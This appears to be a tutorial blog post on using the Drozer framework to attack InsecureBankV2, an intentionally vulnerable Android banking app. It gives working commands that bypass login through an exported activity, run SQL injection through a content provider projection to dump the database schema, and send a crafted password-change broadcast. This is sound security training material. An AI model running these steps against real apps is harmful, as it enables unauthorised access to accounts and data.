πŸ‘¨β€πŸ’»πŸ‘ΎπŸ‘¨β€πŸ’»πŸ‘ΎπŸ‘¨β€πŸ’»πŸ‘Ύ

d-drozer

4 min read

Using Drozer for Analysis

https://github.com/ReversecLabs/drozer β†’ Download Drozer.

We can use Python3 to install drozer:

pip install C:\Users\secsh\Downloads\drozer-3.1.0-py3-none-any.whl

Add it to environment variable PATH so it’s easier to use:

image

Install Drozer agent on emulator:

image image

Once installed, turn on the embedded server:

image image

Following command sets up a port forwarding between your PC and the emulator. This allows Drozer (on your PC) to talk to the agent (on the emulator) without needing an IP address.

image

Basic Usage

run app.package.info -a com.android.insecurebankv2

image

First check on attack surfaces:

run app.package.attacksurface com.android.insecurebankv2

image

We can see that:

  • 5 activities exported β†’ These are screens (Activities) in the app that other apps could potentially start without restriction. Exported activities are often attack vectors.
  • 1 broadcast receiver exported β†’ A receiver that can listen to system or custom intents from other apps. Could be abused if not protected.
  • 1 content provider exported β†’ A data-sharing component that other apps can query or modify. Needs proper permissions
  • 0 services exported β†’ No background services are exported, so less risk there.
  • is debuggable β†’ The app is marked as debuggable, which makes it easier to attack (you can attach debuggers, access private data, etc.).

Exploit Activity

run app.activity.info -a com.android.insecurebankv2

image

Each line shows an activity name and its required permission.

  • Permission: null β†’ No permission is required, so any other app could potentially start these activities.
  • Activities like DoTransfer or ViewStatement are especially sensitive because they could allow money transfers or data viewing without authentication if exploited.

Before we run any command, we can see that Insecurebank is not logged in yet:

image

Let’s exploit the PostLogin activity:

dz> run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2.PostLogin
Attempting to run shell module

Now we are logged in:

image

Exploiting Content Providers

This app’s TrackUserContentProvider is completely unprotected.

dz> run app.provider.info -a com.android.insecurebankv2
Attempting to run shell module
Package: com.android.insecurebankv2
  Authority: com.android.insecurebankv2.TrackUserContentProvider
    Read Permission: null
    Write Permission: null
    Content Provider: com.android.insecurebankv2.TrackUserContentProvider
    Multiprocess Allowed: False
    Grant Uri Permissions: False

Any other app could:

  • Query sensitive data (user info, transactions, etc.)
  • Insert or modify records
  • Potentially compromise the app’s logic

We can find some accessible content URIs:

dz> run scanner.provider.finduris -a com.android.insecurebankv2
Attempting to run shell module
Scanning com.android.insecurebankv2...
No respone from content URI:      content://com.android.insecurebankv2.TrackUserContentProvider/
Got a response from content Uri:  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/
No respone from content URI:      content://com.android.insecurebankv2.TrackUserContentProvider
No respone from content URI:      content://com.google.android.gms.games
Got a response from content Uri:  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers
No respone from content URI:      content://com.google.android.gms.games/

For sure accessible content URIs:
  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/
  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers

We can check whether it’s vulnerable or not:

dz> run scanner.provider.injection -a com.android.insecurebankv2
Attempting to run shell module
Scanning com.android.insecurebankv2...
Not Vulnerable:
  content://com.android.insecurebankv2.TrackUserContentProvider
  content://com.android.insecurebankv2.TrackUserContentProvider/
  content://com.google.android.gms.games
  content://com.google.android.gms.games/

Injection in Projection:
  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/
  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers

Injection in Selection:
  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/
  content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers

Below is the basic query syntax:

dz> run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers
Attempting to run shell module
| id | name |

We can manually try injecting as such:

dz> run app.provider.query content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers/ --projection "* FROM sqlite_master; --"
Attempting to run shell module
| type  | name             | tbl_name         | rootpage | sql                                                                            |
| table | android_metadata | android_metadata | 3        | CREATE TABLE android_metadata (locale TEXT)                                    |
| table | names            | names            | 4        | CREATE TABLE names (id INTEGER PRIMARY KEY AUTOINCREMENT,  name TEXT NOT NULL) |
| table | sqlite_sequence  | sqlite_sequence  | 5        | CREATE TABLE sqlite_sequence(name,seq)                                         |

Exploiting Broadcast Receivers

Any malicious app can send theBroadcast and it will trigger MyBroadCastReceiver:

dz> run app.broadcast.info -a com.android.insecurebankv2 -i
Attempting to run shell module
Package: com.android.insecurebankv2
  com.android.insecurebankv2.MyBroadCastReceiver
    Intent Filter:
      Actions:
        - theBroadcast
    Permission: null

Check on the code through jadx:

image

Understanding the context through jadx, we can exploit as such:

dz> run app.broadcast.send --action theBroadcast --extra string phonenumber 5554321 --extra string newpass Hello!@#
Attempting to run shell module

Graph View